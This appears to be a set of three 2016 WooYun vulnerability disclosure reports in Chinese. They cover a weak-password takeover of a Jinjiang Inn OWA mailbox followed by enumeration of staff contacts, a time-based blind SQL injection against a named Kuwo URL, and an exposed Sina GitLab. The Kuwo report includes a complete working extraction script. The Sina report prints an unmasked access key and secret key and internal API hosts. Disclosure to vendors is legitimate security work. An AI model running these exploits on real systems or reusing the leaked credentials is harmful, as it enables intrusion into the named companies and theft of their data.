漏洞详情披露状态： 2016-04-23： 细节已通知厂商并且等待厂商处理中2016-04-25： 厂商已经确认，细节仅向厂商公开2016-05-05： 细节向核心白帽子及相关领域专家公开2016-05-15： 细节向普通白帽子公开2016-05-25： 细节向实习白帽子公开2016-06-09： 细节向公众公开简要描述：总会有一两个弱口令的，有一两个又会引出后续更多的问题，[email protected]/* */大牛的教育详细说明：https://mail.jj-inn.com/owa/锦江之星的邮件系统，看了一下以前的漏洞，似乎很少有关于锦江之星邮箱弱口令的,基本上都是SQL注入类的，今天找到一枚弱口令邮箱code 区域[email protected]/* */看到跳转了，跳到了重置密码的页面，后来在邮箱里面发现有一个90天的周期，周期结束，强制更改密码，我估计这个账号已经很久没有人登陆了重置密码为：adm!n123，OK了邮箱有很多关于账号密码的邮件，且大部分都是弱口令后面发现很多账号使用的是1qaz2wsx,111111,a12345等弱口令(当然不是邮箱账号，而是分配给代理商的账号和密码)code 区域https://220.196.57.152:442/por/service.csp vpn地址使用账号密码登陆，没有vpn权限，看来还得找运维的人才是靠谱。 漏洞证明：下面开始重点，就是outlook web app的联系人导出问题这个问题，[email protected]/* */大牛，他告诉我，看一下这篇code 区域 WooYun: 视频网站安全之优酷土豆账户体系控制不严引发内网漫游（涉及后台\云平台主站\内部商城全部源码\100台服务器权限和数据库信息等） 每个联系人都有一个特别的ID，如下面按分组，找到全部员工然后保存网页到本地code 区域https://mail.jj-inn.com/owa/?ae=Item&a=Open&t=ADDistList&id=K15rPYxhC0OQKMpSvP7uPw%3d%3d&pspid=_1461300333450_341817680自己写一个脚本程序，使用正则表达式将id提取出来，共计3000多个id由于变成不是很好，试着使用脚本访问https，一直出错，verify设置为False也不行，求教育。这条路子封了，我们还有别的路，对了burp suite，设置变量，将提出的id导入burp中，开跑了code 区域页面get包 GET /owa/?ae=Item&a=Open&t=AD.RecipientType.User&id=§xvJJGKCHR0ayfdGVbJhkvw%3d%3d§&pspid=_1461299763468_260363118 HTTP/1.1 Host: mail.jj-inn.com Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: MstrPgLd1=1; MstrPgLd2=1; OutlookSession=15b24012de8a4933869***909a092192; PBack=0; cadata="0mAqYK1o8RGO0J5O4f****8xJ2CoQkT+7xsdJ2XlPt3*****5zfJzlaAzk3IYW8KZCamJPaLIj0Q0wwW+***FDQ=="; sessionid=8c87b22b-1****6-4a23-9073-1ee0d78f6b3f; UserContext=I8fkTxI27kWUL-lZbr2cp8z4piBDcNMIBjGhfTfhzZ7S73u99o-2vRYCXR8wJ6ELYTv***Gq1bk.; tzid=China Standard Time; owacsdc=1使用burp中的正则表达式提取邮箱很顺利拿到了全部邮箱 修复方案：增强员工安全意识版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-25 10:10厂商回复：已确认，感谢提醒最新状态：暂无

漏洞详情披露状态： 2016-04-29： 细节已通知厂商并且等待厂商处理中2016-05-02： 厂商已经确认，细节仅向厂商公开2016-05-12： 细节向核心白帽子及相关领域专家公开2016-05-22： 细节向普通白帽子公开2016-06-01： 细节向实习白帽子公开2016-06-16： 细节向公众公开简要描述：来一发详细说明：http://mobile.kuwo.cn/mpage/special/oldSpecail.jsp?specialType=(if(1=2,sleep(5),2))&nowId=1033(if(1=1,sleep(5),2))：Error 503 Service Unavailable(if(1=2,sleep(5),2))：返回200database() is EDITOR漏洞证明： code 区域# -*- coding: utf8 -*- #encoding=utf-8 import httplib import time import string import sys headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36', 'Referer': 'http://ldj.db.17173.com', } payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') print '[%s] Start to retrive MySQL database()' % time.strftime('%H:%M:%S', time.localtime()) database = '' for i in range(1,7,1): for payload in payloads: try: conn = httplib.HTTPConnection('mobile.kuwo.cn', timeout=20) conn.request(method='GET', url="/mpage/special/oldSpecail.jsp?specialType=(if(ascii(substr(database(),"+str(i)+",1))="+str(ord(payload))+",sleep(10),1))") status = conn.getresponse().status conn.close() except Exception, e: print e database += payload print '\r[+]Running:' ,database time.sleep(0.01) break print '' print 'database() is', database 修复方案：预编译处理版权声明：转载请注明来源 Vinc@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-05-02 19:29厂商回复：感谢对酷我的支持，我们将尽快进行修复！最新状态：暂无

漏洞详情披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述：新浪某处系统源代码泄露（内网系统源代码和大量内网数据库）数据库和各种系统配置应该有上百个吧 感觉很多详细说明：http://111.13.87.178/应该是为了某个项目临时搭建的Gitlab可注册test/testtest下载源代码mysqlapihttp://111.13.87.178/christian/mysqlapi/repository/archive.zip?ref=masterdpadmint.grid.sina.com.cnhttp://111.13.87.178/root/dpadmint.grid.sina.com.cn/repository/archive.zip?ref=masterredis_autohttp://111.13.87.178/jingbo8/redis_auto/repository/archive.zip?ref=masteridb.cluster.sina.com.cnhttp://111.13.87.178/root/idb.cluster.sina.com.cn/repository/archive.zip?ref=master都是内网系统代码大量数据库配置mask 区域*****I config ***** *****lap***** *****.grid.sin***** *****= 4***** *****mysq***** *****ipalqs***** *****= mys***** ********** *****ne]***** *****mysq***** *****Jxh2Mn***** ********** *****t_ar***** *****imes***** *****imeout***** ********** *****atio***** *****r = re***** *****d = eHn***** ********** *****l_c***** *****ocal/mysql***** ********** *****ddl***** *****e.grid.si***** *****= 4***** *****auto***** *****= aut***** *****= aut***** ********** *****erb***** *****e.grid.si***** *****= 4***** *****= wor***** *****work***** *****rkerbee***** ********** *****man***** *****e.grid.si***** *****= 4***** *****= aut***** *****auto***** *****a8fo37***** *****9bb17***** *****er.sina.com.cn/auto***** ********** *****gra***** *****e.grid.si***** *****= 4***** *****= aut***** *****auto***** *****a8fo37***** ********** *****rdb***** *****auto***** *****a8fo37***** ********** *****yst***** *****e.grid.si***** *****= 4***** *****= log***** *****logs***** *****a8fo37***** ********** *****sys***** *****llo.grid.***** *****= 3***** *****mysq***** *****Jxh2Mn***** *****#039;nwdp_admin'***** ********** *****se_t***** *****o.grid.si***** *****,3296,329***** *****mysq***** *****Jxh2Mn***** *****e = ***** ********** *****掉，同时将***** *****mi***** *****llo.grid.***** *****llo.grid.s***** *****ollo.grid***** *****0.73.***** *****= 3***** ***** = ***** *****mysq***** *****Jxh2Mn***** *****= dp_***** ***** dptes***** ********** ********** *****at]***** *****.75.1***** *****= 8***** *****= v4s***** *****mysq***** *****Jxh2Mn***** ********** *****em_te***** *****.73.1***** *****= 3***** *****mysq***** *****Jxh2Mn***** *****dptest***** ********** *****ist***** *****llo.grid.***** *****= 3***** *****mysq***** *****Jxh2Mn***** ********** *****dat***** *****llo.grid.***** *****= 9***** *****mysq***** *****Jxh2Mn***** ********** *****anc***** *****e.grid.si***** *****= 4***** *****= ins***** *****inst***** *****a8fo37***** *****sql.cluste***** ********** *****lt***** *****da.grid.s***** *****= 9***** *****= sin***** *****mysq***** *****Jxh2Mn***** ********** *****tor***** *****.monitor.sina.c***** *****nitor.sina.com.***** *****ut ***** ********** *****on_***** *****os.grid.clust***** *****rt = ***** ***** interval_ti***** ***** /falco***** ********** *****ys]***** *****e = ***** *****W3wQGJ***** *****i.rt.intra***** ***** = rt_d***** *****e = rt_d***** *****rt.intra.s***** *****port ***** *****rtual_***** ********** *****tab***** *****9bb17***** *****auto***** *****21/automan/rt***** ********** *****er_li***** *****.grid.si***** *****lo.grid.s***** *****.grid.si***** *****rid.sina***** *****.grid.sin***** *****.grid.sin***** *****.grid.sin***** *****.grid.sin***** *****.grid.sin***** ********** *****fil***** *****xinyu7_script/***** *****p/xinyu7_scrip***** *****n/alert.d/admin***** ********** *****t]***** *****/data1/***** ********** ********** *****er_li***** *****om.cn,ns2.mars***** *****.com.cn,ns2.apo***** *****om.cn,ns2.hebe***** *****om.cn,ns2.eos***** *****om.cn,ns2.orion***** *****om.cn,ns2.atlas***** *****om.cn,ns2.aries***** *****om.cn,ns2.randa***** *****om.cn,ns2.testa***** ********** *****bas***** *****dk6Bv9uEX***** ***** 30***** *****ut ***** ********** *****on]***** *****inasrv2/bi***** ********** *****h]***** *****imes***** *****ina.com/add_a***** *****r = ***** *****1eyi5xIGS5***** *****d = s***** *****ut = ***** *****t = j***** ********** *****nec***** *****21101***** *****4Xe0UTph2a***** *****nitor.sin***** *****/v1/ale***** *****/server/m***** ********** *****on]***** *****s.grid.si***** *****= 3***** *****mysq***** *****Jxh2Mn***** *****e = ***** code 区域$web1=file_get_contents("http://dpadmin.grid.sina.com.cn/api/fetch_newestfile.php?title=web1_httpd.conf"); $web2=file_get_contents("http://dpadmin.grid.sina.com.cn/api/fetch_newestfile.php?title=web2_httpd_vhost.conf"); $sso_web=file_get_contents("http://dpadmin.grid.sina.com.cn/api/fetch_newestfile.php?title=会员统一登录vhost.conf"); $weibo_web2=file_get_contents("http://dpadmint.grid.sina.com.cn/api/fetch_newestfile.php?title=微博前端httpd-vhost.conf"); $hezuo_web=file_get_contents("http://dpadmint.grid.sina.com.cn/api/fetch_newestfile.php?title=wbtest-httpd-vhost.conf"); $pay1=file_get_contents("http://dpadminp.grid.sina.com.cn/api/fetch_newestfile.php?title=微博支付前端httpd-vhost.conf"); $pay2=file_get_contents("http://dpadminp.grid.sina.com.cn/api/fetch_newestfile.php?title=新浪支付前端httpd-vhost.conf");code 区域$timestamp=time(); $secretkey="eb8d5b925db7406eb416ad3532158995O31CMLzb"; $accesskey="moGDZOo2C72DBBC4B4A7"; $url=urlencode("动态应用平台"); $string="GET\n\n\n\n/rest/v2/yunwei/d_h_by_product_domain/动态应用平台?accesskey=$accesskey&timestamp=$timestamp"; $ssig=dip_ssig("$secretkey","$string"); $ch=curl_init("http://api.dip.sina.com.cn/rest/v2/yunwei/d_h_by_product_domain/$url?accesskey=$accesskey&timestamp=$timestamp&ssig=$ssig"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); $ce=curl_exec($ch); curl_close($ch); $result=json_decode($ce); #print_r($result);mask 区域*****php***** ********** *****for_test'] = ***** ********** *****default_mod']***** *****default_action***** ********** *****t_file_permissions***** *****ult_file_owner'***** *****'default_b***** *****039;default_bati***** ********** *****e'] = 'SinaR***** *****sue.internal.sina.com.cn/secure/Crea***** *****g_mark***** ********** *****'bdsshport***** *****calfiledir'] =***** *****st'] = 'http***** *****9;pubtopic']***** *****conftopic'] = &***** *****st'] = 'htt***** *****'msg_slice***** *****rootusername'***** *****] = '[email protected]/* */**********confdir'] = ********************/www/htdocs/".$_SERVER['HT**********ww/htdocs/".$_SERVER['HTT********************mc_host'] = &**********9;mc_port'] ********************ap_host'] = &#**********]['ldap_p**********39;] = 'ou=sina,dc=s**********ecret'] = '********************commondb'] = ********************]['email_********************ecDir']=ROOT.&**********packIp']=**********svnIp']='**********yumIp']='**********omain']='y********************039;]='svn://svn.**********9;svnUname']**********wd']='imil**********Dir']=ROOT.**********9;repo']=**********9;rpms']=**********heq_servers']=&#********************'/etc/dAppClu**********r'] = $adminer_t**********39;dpadmint-**********host'] = 'htt********** == 'dp**********9;] = 'http://maya-api********** == 'dp**********9;] = 'http://maya-api*****大量业务服务器信息 漏洞证明： 修复方案： 版权声明：转载请注明来源 鸟云厂商@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-03 17:40厂商回复：感谢关注新浪安全，安全问题修复中。最新状态：暂无